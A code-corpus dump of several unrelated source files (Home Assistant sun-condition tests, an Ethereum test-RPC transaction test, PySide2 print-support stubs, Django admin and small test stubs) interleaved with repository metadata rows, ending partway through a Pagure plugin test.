"condition": {"condition": "sun", "before": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-07-24 07:21:12 local, sunset: 2015-07-25 03:13:33 local
# sunrise: 2015-07-24 15:21:12 UTC, sunset: 2015-07-25 11:13:33 UTC
# now = sunrise + 1s -> 'before sunrise' not true
now = datetime(2015, 7, 24, 15, 21, 13, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-07-24T15:16:46.975735+00:00"},
)
# now = sunrise - 1h -> 'before sunrise' true
now = datetime(2015, 7, 24, 14, 21, 12, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-07-24T15:16:46.975735+00:00"},
)
# now = local midnight -> 'before sunrise' true
now = datetime(2015, 7, 24, 8, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-07-24T15:16:46.975735+00:00"},
)
# now = local midnight - 1s -> 'before sunrise' not true
now = datetime(2015, 7, 24, 7, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-07-23T15:12:19.155123+00:00"},
)
async def test_if_action_after_sunrise_no_offset_kotzebue(hass, hass_ws_client, calls):
"""
Test if action was after sunrise.
Local timezone: Alaska time
Location: Kotzebue, which has a very skewed local timezone with sunrise
at 7 AM and sunset at 3AM during summer
Before sunrise is true from midnight until sunrise, local time.
"""
tz = dt_util.get_time_zone("America/Anchorage")
dt_util.set_default_time_zone(tz)
hass.config.latitude = 66.5
hass.config.longitude = 162.4
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "after": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-07-24 07:21:12 local, sunset: 2015-07-25 03:13:33 local
# sunrise: 2015-07-24 15:21:12 UTC, sunset: 2015-07-25 11:13:33 UTC
# now = sunrise -> 'after sunrise' true
now = datetime(2015, 7, 24, 15, 21, 12, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-07-24T15:16:46.975735+00:00"},
)
# now = sunrise - 1h -> 'after sunrise' not true
now = datetime(2015, 7, 24, 14, 21, 12, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-07-24T15:16:46.975735+00:00"},
)
# now = local midnight -> 'after sunrise' not true
now = datetime(2015, 7, 24, 8, 0, 1, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-07-24T15:16:46.975735+00:00"},
)
# now = local midnight - 1s -> 'after sunrise' true
now = datetime(2015, 7, 24, 7, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-07-23T15:12:19.155123+00:00"},
)
async def test_if_action_before_sunset_no_offset_kotzebue(hass, hass_ws_client, calls):
"""
Test if action was before sunrise.
Local timezone: Alaska time
Location: Kotzebue, which has a very skewed local timezone with sunrise
at 7 AM and sunset at 3AM during summer
Before sunset is true from midnight until sunset, local time.
"""
tz = dt_util.get_time_zone("America/Anchorage")
dt_util.set_default_time_zone(tz)
hass.config.latitude = 66.5
hass.config.longitude = 162.4
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "before": SUN_EVENT_SUNSET},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-07-24 07:21:12 local, sunset: 2015-07-25 03:13:33 local
# sunrise: 2015-07-24 15:21:12 UTC, sunset: 2015-07-25 11:13:33 UTC
# now = sunset + 1s -> 'before sunset' not true
now = datetime(2015, 7, 25, 11, 13, 34, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-07-25T11:13:32.501837+00:00"},
)
# now = sunset - 1h-> 'before sunset' true
now = datetime(2015, 7, 25, 10, 13, 33, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-07-25T11:13:32.501837+00:00"},
)
# now = local midnight -> 'before sunrise' true
now = datetime(2015, 7, 24, 8, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-07-24T11:17:54.446913+00:00"},
)
# now = local midnight - 1s -> 'before sunrise' not true
now = datetime(2015, 7, 24, 7, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-07-23T11:22:18.467277+00:00"},
)
async def test_if_action_after_sunset_no_offset_kotzebue(hass, hass_ws_client, calls):
"""
Test if action was after sunrise.
Local timezone: Alaska time
Location: Kotzebue, which has a very skewed local timezone with sunrise
at 7 AM and sunset at 3AM during summer
After sunset is true from sunset until midnight, local time.
"""
tz = dt_util.get_time_zone("America/Anchorage")
dt_util.set_default_time_zone(tz)
hass.config.latitude = 66.5
hass.config.longitude = 162.4
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "after": SUN_EVENT_SUNSET},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-07-24 07:21:12 local, sunset: 2015-07-25 03:13:33 local
# sunrise: 2015-07-24 15:21:12 UTC, sunset: 2015-07-25 11:13:33 UTC
# now = sunset -> 'after sunset' true
now = datetime(2015, 7, 25, 11, 13, 33, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-07-25T11:13:32.501837+00:00"},
)
# now = sunset - 1s -> 'after sunset' not true
now = datetime(2015, 7, 25, 11, 13, 32, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-07-25T11:13:32.501837+00:00"},
)
# now = local midnight -> 'after sunset' not true
now = datetime(2015, 7, 24, 8, 0, 1, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-07-24T11:17:54.446913+00:00"},
)
# now = local midnight - 1s -> 'after sunset' true
now = datetime(2015, 7, 24, 7, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-07-23T11:22:18.467277+00:00"},
)
| 33.475792 | 88 | 0.558766 | 10,253 | 91,958 | 4.827465 | 0.035989 | 0.039155 | 0.029396 | 0.035276 | 0.899265 | 0.880394 | 0.860049 | 0.83631 | 0.818692 | 0.782609 | 0 | 0.059285 | 0.30316 | 91,958 | 2,746 | 89 | 33.487983 | 0.713124 | 0.06939 | 0 | 0.6385 | 0 | 0 | 0.241145 | 0.070389 | 0 | 0 | 0 | 0 | 0.11568 | 1 | 0.003615 | false | 0 | 0.005423 | 0 | 0.010845 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
22db5c0efa67a48ea7ce2e5f94297c5abb19f397 | 1,530 | py | Python | tests/endpoints/test_eth_sendTransaction.py | kanzure/eth-testrpc | cbb22ff2bebc9f12098b0bb7f2a245f3510522b4 | [
"MIT"
] | 164 | 2016-04-20T08:30:22.000Z | 2022-01-05T07:43:12.000Z | tests/endpoints/test_eth_sendTransaction.py | kanzure/eth-testrpc | cbb22ff2bebc9f12098b0bb7f2a245f3510522b4 | [
"MIT"
] | 55 | 2016-06-30T20:06:56.000Z | 2019-12-12T07:36:02.000Z | tests/endpoints/test_eth_sendTransaction.py | kanzure/eth-testrpc | cbb22ff2bebc9f12098b0bb7f2a245f3510522b4 | [
"MIT"
] | 46 | 2016-04-27T16:28:46.000Z | 2022-01-09T17:59:09.000Z | from testrpc.client.utils import force_text
def test_eth_sendTransaction(rpc_client, accounts, hex_accounts):
result = rpc_client(
method="eth_sendTransaction",
params=[{
"from": accounts[0],
"to": accounts[1],
"value": 1234,
"data": "0x1234",
"gas": 100000,
"gasPrice": 4321,
}],
)
assert len(result) == 66
txn = rpc_client(
method="eth_getTransactionByHash",
params=[result],
)
assert txn['from'] == force_text(hex_accounts[0])
assert txn['to'] == force_text(hex_accounts[1])
assert txn['value'] == hex(1234)
assert txn['input'] == '0x1234'
assert txn['gas'] == hex(100000)
assert txn['gasPrice'] == hex(4321)
def test_eth_sendTransaction_with_hex_values(rpc_client, accounts, hex_accounts):
result = rpc_client(
method="eth_sendTransaction",
params=[{
"from": accounts[0],
"to": accounts[1],
"value": hex(1234),
"data": "0x1234",
"gas": hex(100000),
"gasPrice": hex(4321),
}],
)
assert len(result) == 66
txn = rpc_client(
method="eth_getTransactionByHash",
params=[result],
)
assert txn['from'] == force_text(hex_accounts[0])
assert txn['to'] == force_text(hex_accounts[1])
assert txn['value'] == hex(1234)
assert txn['input'] == '0x1234'
assert txn['gas'] == hex(100000)
assert txn['gasPrice'] == hex(4321)
| 27.818182 | 81 | 0.558824 | 167 | 1,530 | 4.952096 | 0.215569 | 0.130593 | 0.072551 | 0.087062 | 0.793229 | 0.793229 | 0.793229 | 0.793229 | 0.793229 | 0.793229 | 0 | 0.080512 | 0.285621 | 1,530 | 54 | 82 | 28.333333 | 0.676121 | 0 | 0 | 0.723404 | 0 | 0 | 0.141176 | 0.031373 | 0 | 0 | 0.015686 | 0 | 0.297872 | 1 | 0.042553 | false | 0 | 0.021277 | 0 | 0.06383 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a3b1bc0100bd08032aaeccff307c3bccee6e5298 | 126 | py | Python | __init__.py | MarcerCyoon/DecisionMakerSLR | 019cd291d90e5e85284b099eab71f7e8c18f3a53 | [
"MIT"
] | 1 | 2019-08-02T09:47:11.000Z | 2019-08-02T09:47:11.000Z | __init__.py | MarcerCyoon/DecisionMakerSLR | 019cd291d90e5e85284b099eab71f7e8c18f3a53 | [
"MIT"
] | null | null | null | __init__.py | MarcerCyoon/DecisionMakerSLR | 019cd291d90e5e85284b099eab71f7e8c18f3a53 | [
"MIT"
] | 2 | 2020-01-04T06:13:52.000Z | 2020-01-08T04:06:08.000Z | # What an amazing python file.
from .faclass import Player
from .faclass import teamOffer
__all__ = ['Player', 'teamOffer']
| 18 | 33 | 0.746032 | 16 | 126 | 5.625 | 0.6875 | 0.244444 | 0.377778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15873 | 126 | 6 | 34 | 21 | 0.849057 | 0.222222 | 0 | 0 | 0 | 0 | 0.15625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a3dcbc99b1a76a14b9835bb6359467e644a9f15d | 181 | py | Python | troc/apps/record/admin.py | Windfarer/species2 | 15849c5805621410f3e8c26d27213f9bcf483fd1 | [
"MIT"
] | 1 | 2020-01-02T11:50:50.000Z | 2020-01-02T11:50:50.000Z | troc/apps/record/admin.py | Windfarer/species2 | 15849c5805621410f3e8c26d27213f9bcf483fd1 | [
"MIT"
] | 5 | 2019-12-15T07:43:46.000Z | 2022-02-26T17:47:26.000Z | troc/apps/record/admin.py | Windfarer/species2 | 15849c5805621410f3e8c26d27213f9bcf483fd1 | [
"MIT"
] | 1 | 2020-06-13T02:25:42.000Z | 2020-06-13T02:25:42.000Z | from django.contrib import admin
from .models import Record
# Register your models here.
class RecordAdmin(admin.ModelAdmin):
pass
admin.site.register(Record, RecordAdmin) | 22.625 | 40 | 0.779006 | 23 | 181 | 6.130435 | 0.652174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.149171 | 181 | 8 | 40 | 22.625 | 0.915584 | 0.143646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
4a8d3a211d400db8f96b7a2f69e994de49f8be9f | 15,270 | py | Python | PySide2/QtPrintSupport.py | arjun-namdeo/py_stubs | 605bb167e239978f5417f3f1fc1f5c12e2a243cc | [
"MIT"
] | null | null | null | PySide2/QtPrintSupport.py | arjun-namdeo/py_stubs | 605bb167e239978f5417f3f1fc1f5c12e2a243cc | [
"MIT"
] | null | null | null | PySide2/QtPrintSupport.py | arjun-namdeo/py_stubs | 605bb167e239978f5417f3f1fc1f5c12e2a243cc | [
"MIT"
] | null | null | null | from PySide2.QtGui import QPagedPaintDevice as _QPagedPaintDevice
from PySide2.QtWidgets import QDialog as _QDialog
class _Object(object):
__dict__ = None
from . import QtWidgets as _QtWidgets
class QPrintPreviewWidget(_QtWidgets.QWidget):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def currentPage(*args, **kwargs):
pass
def fitInView(*args, **kwargs):
pass
def fitToWidth(*args, **kwargs):
pass
def orientation(*args, **kwargs):
pass
def pageCount(*args, **kwargs):
pass
def print_(*args, **kwargs):
pass
def setAllPagesViewMode(*args, **kwargs):
pass
def setCurrentPage(*args, **kwargs):
pass
def setFacingPagesViewMode(*args, **kwargs):
pass
def setLandscapeOrientation(*args, **kwargs):
pass
def setOrientation(*args, **kwargs):
pass
def setPortraitOrientation(*args, **kwargs):
pass
def setSinglePageViewMode(*args, **kwargs):
pass
def setViewMode(*args, **kwargs):
pass
def setVisible(*args, **kwargs):
pass
def setZoomFactor(*args, **kwargs):
pass
def setZoomMode(*args, **kwargs):
pass
def updatePreview(*args, **kwargs):
pass
def viewMode(*args, **kwargs):
pass
def zoomFactor(*args, **kwargs):
pass
def zoomIn(*args, **kwargs):
pass
def zoomMode(*args, **kwargs):
pass
def zoomOut(*args, **kwargs):
pass
AllPagesView = None
CustomZoom = None
FacingPagesView = None
FitInView = None
FitToWidth = None
SinglePageView = None
ViewMode = None
ZoomMode = None
__new__ = None
paintRequested = None
previewChanged = None
staticMetaObject = None
class QAbstractPrintDialog(_QDialog):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def addEnabledOption(*args, **kwargs):
pass
def enabledOptions(*args, **kwargs):
pass
def exec_(*args, **kwargs):
pass
def fromPage(*args, **kwargs):
pass
def isOptionEnabled(*args, **kwargs):
pass
def maxPage(*args, **kwargs):
pass
def minPage(*args, **kwargs):
pass
def printRange(*args, **kwargs):
pass
def printer(*args, **kwargs):
pass
def setEnabledOptions(*args, **kwargs):
pass
def setFromTo(*args, **kwargs):
pass
def setMinMax(*args, **kwargs):
pass
def setOptionTabs(*args, **kwargs):
pass
def setPrintRange(*args, **kwargs):
pass
def toPage(*args, **kwargs):
pass
AllPages = None
CurrentPage = None
DontUseSheet = None
locals()['None'] = None
PageRange = None
PrintCollateCopies = None
PrintCurrentPage = None
PrintDialogOption = None
PrintDialogOptions = None
PrintPageRange = None
PrintRange = None
PrintSelection = None
PrintShowPageSize = None
PrintToFile = None
Selection = None
__new__ = None
staticMetaObject = None
class QPageSetupDialog(_QDialog):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def done(*args, **kwargs):
pass
def exec_(*args, **kwargs):
pass
def open(*args, **kwargs):
pass
def printer(*args, **kwargs):
pass
def setVisible(*args, **kwargs):
pass
__new__ = None
staticMetaObject = None
class QPrintEngine(_Object):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def abort(*args, **kwargs):
pass
def metric(*args, **kwargs):
pass
def newPage(*args, **kwargs):
pass
def printerState(*args, **kwargs):
pass
def property(*args, **kwargs):
pass
def setProperty(*args, **kwargs):
pass
PPK_CollateCopies = None
PPK_ColorMode = None
PPK_CopyCount = None
PPK_Creator = None
PPK_CustomBase = None
PPK_CustomPaperSize = None
PPK_DocumentName = None
PPK_Duplex = None
PPK_FontEmbedding = None
PPK_FullPage = None
PPK_NumberOfCopies = None
PPK_Orientation = None
PPK_OutputFileName = None
PPK_PageMargins = None
PPK_PageOrder = None
PPK_PageRect = None
PPK_PageSize = None
PPK_PaperName = None
PPK_PaperRect = None
PPK_PaperSize = None
PPK_PaperSource = None
PPK_PaperSources = None
PPK_PrinterName = None
PPK_PrinterProgram = None
PPK_QPageLayout = None
PPK_QPageMargins = None
PPK_QPageSize = None
PPK_Resolution = None
PPK_SelectionOption = None
PPK_SupportedResolutions = None
PPK_SupportsMultipleCopies = None
PPK_WindowsPageSize = None
PrintEnginePropertyKey = None
__new__ = None
class QPrinter(_QPagedPaintDevice):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def abort(*args, **kwargs):
pass
def actualNumCopies(*args, **kwargs):
pass
def collateCopies(*args, **kwargs):
pass
def colorMode(*args, **kwargs):
pass
def copyCount(*args, **kwargs):
pass
def creator(*args, **kwargs):
pass
def devType(*args, **kwargs):
pass
def docName(*args, **kwargs):
pass
def doubleSidedPrinting(*args, **kwargs):
pass
def duplex(*args, **kwargs):
pass
def fontEmbeddingEnabled(*args, **kwargs):
pass
def fromPage(*args, **kwargs):
pass
def fullPage(*args, **kwargs):
pass
def getPageMargins(*args, **kwargs):
pass
def isValid(*args, **kwargs):
pass
def metric(*args, **kwargs):
pass
def newPage(*args, **kwargs):
pass
def numCopies(*args, **kwargs):
pass
def orientation(*args, **kwargs):
pass
def outputFileName(*args, **kwargs):
pass
def outputFormat(*args, **kwargs):
pass
def pageOrder(*args, **kwargs):
pass
def pageRect(*args, **kwargs):
pass
def pageSize(*args, **kwargs):
pass
def paintEngine(*args, **kwargs):
pass
def paperName(*args, **kwargs):
pass
def paperRect(*args, **kwargs):
pass
def paperSize(*args, **kwargs):
pass
def paperSource(*args, **kwargs):
pass
def printEngine(*args, **kwargs):
pass
def printProgram(*args, **kwargs):
pass
def printRange(*args, **kwargs):
pass
def printerName(*args, **kwargs):
pass
def printerState(*args, **kwargs):
pass
def resolution(*args, **kwargs):
pass
def setCollateCopies(*args, **kwargs):
pass
def setColorMode(*args, **kwargs):
pass
def setCopyCount(*args, **kwargs):
pass
def setCreator(*args, **kwargs):
pass
def setDocName(*args, **kwargs):
pass
def setDoubleSidedPrinting(*args, **kwargs):
pass
def setDuplex(*args, **kwargs):
pass
def setEngines(*args, **kwargs):
pass
def setFontEmbeddingEnabled(*args, **kwargs):
pass
def setFromTo(*args, **kwargs):
pass
def setFullPage(*args, **kwargs):
pass
def setMargins(*args, **kwargs):
pass
def setNumCopies(*args, **kwargs):
pass
def setOrientation(*args, **kwargs):
pass
def setOutputFileName(*args, **kwargs):
pass
def setOutputFormat(*args, **kwargs):
pass
def setPageMargins(*args, **kwargs):
pass
def setPageOrder(*args, **kwargs):
pass
def setPageSize(*args, **kwargs):
pass
def setPageSizeMM(*args, **kwargs):
pass
def setPaperName(*args, **kwargs):
pass
def setPaperSize(*args, **kwargs):
pass
def setPaperSource(*args, **kwargs):
pass
def setPrintProgram(*args, **kwargs):
pass
def setPrintRange(*args, **kwargs):
pass
def setPrinterName(*args, **kwargs):
pass
def setResolution(*args, **kwargs):
pass
def setWinPageSize(*args, **kwargs):
pass
def supportedResolutions(*args, **kwargs):
pass
def supportsMultipleCopies(*args, **kwargs):
pass
def toPage(*args, **kwargs):
pass
def winPageSize(*args, **kwargs):
pass
Aborted = None
Active = None
AllPages = None
Auto = None
Cassette = None
Cicero = None
Color = None
ColorMode = None
CurrentPage = None
CustomSource = None
DevicePixel = None
Didot = None
DuplexAuto = None
DuplexLongSide = None
DuplexMode = None
DuplexNone = None
DuplexShortSide = None
Envelope = None
EnvelopeManual = None
Error = None
FirstPageFirst = None
FormSource = None
GrayScale = None
HighResolution = None
Idle = None
Inch = None
Landscape = None
LargeCapacity = None
LargeFormat = None
LastPageFirst = None
LastPaperSource = None
Lower = None
Manual = None
MaxPageSource = None
Middle = None
Millimeter = None
NativeFormat = None
OnlyOne = None
Orientation = None
OutputFormat = None
PageOrder = None
PageRange = None
PaperSource = None
PdfFormat = None
Pica = None
Point = None
Portrait = None
PrintRange = None
PrinterMode = None
PrinterResolution = None
PrinterState = None
ScreenResolution = None
Selection = None
SmallFormat = None
Tractor = None
Unit = None
Upper = None
__new__ = None
class QPrinterInfo(_Object):
def __copy__(*args, **kwargs):
pass
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def __nonzero__(*args, **kwargs):
"""
x.__nonzero__() <==> x != 0
"""
pass
def defaultDuplexMode(*args, **kwargs):
pass
def description(*args, **kwargs):
pass
def isDefault(*args, **kwargs):
pass
def isNull(*args, **kwargs):
pass
def isRemote(*args, **kwargs):
pass
def location(*args, **kwargs):
pass
def makeAndModel(*args, **kwargs):
pass
def printerName(*args, **kwargs):
pass
def state(*args, **kwargs):
pass
def supportedDuplexModes(*args, **kwargs):
pass
def supportedPaperSizes(*args, **kwargs):
pass
def supportedResolutions(*args, **kwargs):
pass
def supportedSizesWithNames(*args, **kwargs):
pass
def supportsCustomPageSizes(*args, **kwargs):
pass
def availablePrinterNames(*args, **kwargs):
pass
def availablePrinters(*args, **kwargs):
pass
def defaultPrinter(*args, **kwargs):
pass
def defaultPrinterName(*args, **kwargs):
pass
def printerInfo(*args, **kwargs):
pass
__new__ = None
class QPrintPreviewDialog(_QDialog):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def done(*args, **kwargs):
pass
def open(*args, **kwargs):
pass
def printer(*args, **kwargs):
pass
def setVisible(*args, **kwargs):
pass
__new__ = None
paintRequested = None
staticMetaObject = None
class QPrintDialog(QAbstractPrintDialog):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def done(*args, **kwargs):
pass
def exec_(*args, **kwargs):
pass
def open(*args, **kwargs):
pass
def options(*args, **kwargs):
pass
def setOption(*args, **kwargs):
pass
def setOptions(*args, **kwargs):
pass
def setVisible(*args, **kwargs):
pass
def testOption(*args, **kwargs):
pass
__new__ = None
accepted = None
staticMetaObject = None
| 14.231128 | 70 | 0.47387 | 1,211 | 15,270 | 5.843931 | 0.199835 | 0.221845 | 0.292779 | 0.336301 | 0.288258 | 0.274269 | 0.274269 | 0.274269 | 0.266215 | 0.137629 | 0 | 0.000347 | 0.433268 | 15,270 | 1,072 | 71 | 14.244403 | 0.817425 | 0.034774 | 0 | 0.507659 | 0 | 0 | 0.000275 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.343545 | false | 0.343545 | 0.006565 | 0 | 0.654267 | 0.028446 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
435ee3de7eabd596675a6ed4b873bc464a8e47df | 204 | py | Python | test/test_util.py | xfuzzycomp/FuzzyAsteroids | 636707499b4689bdecd8af32231c3ffd43f6583b | [
"MIT"
] | 1 | 2021-09-14T20:38:08.000Z | 2021-09-14T20:38:08.000Z | test/test_util.py | xfuzzycomp/FuzzyAsteroids | 636707499b4689bdecd8af32231c3ffd43f6583b | [
"MIT"
] | null | null | null | test/test_util.py | xfuzzycomp/FuzzyAsteroids | 636707499b4689bdecd8af32231c3ffd43f6583b | [
"MIT"
] | null | null | null | from unittest import TestCase
from src.fuzzy_asteroids.util import Scenario, Map, Score
class TestScenario(TestCase):
pass
class TestMap(TestCase):
pass
class TestScore(TestCase):
pass
| 12.75 | 57 | 0.75 | 25 | 204 | 6.08 | 0.64 | 0.236842 | 0.223684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186275 | 204 | 15 | 58 | 13.6 | 0.915663 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.375 | 0.25 | 0 | 0.625 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
4375f868c06e32bb5ba32f6d643002c6196d4fe1 | 8,287 | py | Python | src/tests/test_pagure_flask_ui_plugins_pagure_no_new_branch.py | yifengyou/learn-pagure | e54ba955368918c92ad2be6347b53bb2c24a228c | [
"Unlicense"
] | null | null | null | src/tests/test_pagure_flask_ui_plugins_pagure_no_new_branch.py | yifengyou/learn-pagure | e54ba955368918c92ad2be6347b53bb2c24a228c | [
"Unlicense"
] | null | null | null | src/tests/test_pagure_flask_ui_plugins_pagure_no_new_branch.py | yifengyou/learn-pagure | e54ba955368918c92ad2be6347b53bb2c24a228c | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
"""
(c) 2015-2018 - Copyright Red Hat Inc
Authors:
Pierre-Yves Chibon <pingou@pingoured.fr>
"""
from __future__ import unicode_literals, absolute_import
import unittest
import shutil
import sys
import os
sys.path.insert(
0, os.path.join(os.path.dirname(os.path.abspath(__file__)), "..")
)
import tests
import pagure.config
class PagureFlaskPluginPagureNoNewBranchHooktests(tests.SimplePagureTest):
""" Tests for pagure_no_new_branches plugin of pagure """
def setUp(self):
""" Set up the environnment, ran before every tests. """
super(PagureFlaskPluginPagureNoNewBranchHooktests, self).setUp()
tests.create_projects(self.session)
tests.create_projects_git(os.path.join(self.path, "repos"))
pagure.config.config["GIT_FOLDER"] = os.path.join(self.path, "repos")
with tests.user_set(self.app.application, tests.FakeUser()):
self.csrf_token = self.get_csrf()
def test_plugin_pagure_ticket_no_data(self):
""" Test the pagure_ticket plugin on/off endpoint. """
user = tests.FakeUser(username="pingou")
with tests.user_set(self.app.application, user):
output = self.app.get(
"/test/settings/Prevent creating new branches by git push"
